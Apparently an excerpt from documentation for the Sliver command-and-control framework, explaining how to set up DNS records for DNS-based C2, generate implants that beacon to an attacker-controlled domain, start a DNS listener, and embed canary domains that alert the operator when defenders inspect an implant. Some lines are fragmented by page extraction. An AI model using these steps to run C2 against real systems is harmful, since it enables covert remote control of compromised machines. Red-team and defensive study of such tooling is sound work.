Use the following steps to configure a domain for DNS C2 (and DNS Canaries), you can use any DNS provider you wish as long as you setup the records correctly. I recommend setting a TTL of ~5 minutes for each record.
- Create an
Arecord for your
example.compointing at your Sliver server (or redirector) IP address.
- Create an
Arecord for an
ns1.example.com) that points to your Sliver server (or redirector) IP address.
- Create an NS record with an arbitrary subdomain, for example
1.example.com) which is managed by
- You can now use
1.example.comas your DNS C2 domain e.g.
generate --dns 1.example.com
The final configuration should look like for the domain
IMPORTANT: Remember to disable Cloudflare's "cloud" when configuring these records, and to adjust the TTLs.
DNS Canaries are unique per-binary domains that are optionally inserted during the string obfuscation process. These domains are not actually used by the implant code and are deliberately not obfuscated so that they show up if someone runs
strings on the implant. If these domains are ever resolved (and you have a
dns listener running) you'll get an alert telling which specific file was discovered by the blue team.
generate command with canaries, make sure to use the FQDN:
sliver > generate --http foobar.com --canary 1.example.com.
Make sure you have a DNS listener running, and to use the FQDN:
sliver > dns --domains 1.example.com. [*] Starting DNS listener with parent domain(s) [1.example.com.] ... [*] Successfully started job #1
You can view previously generated canaries with the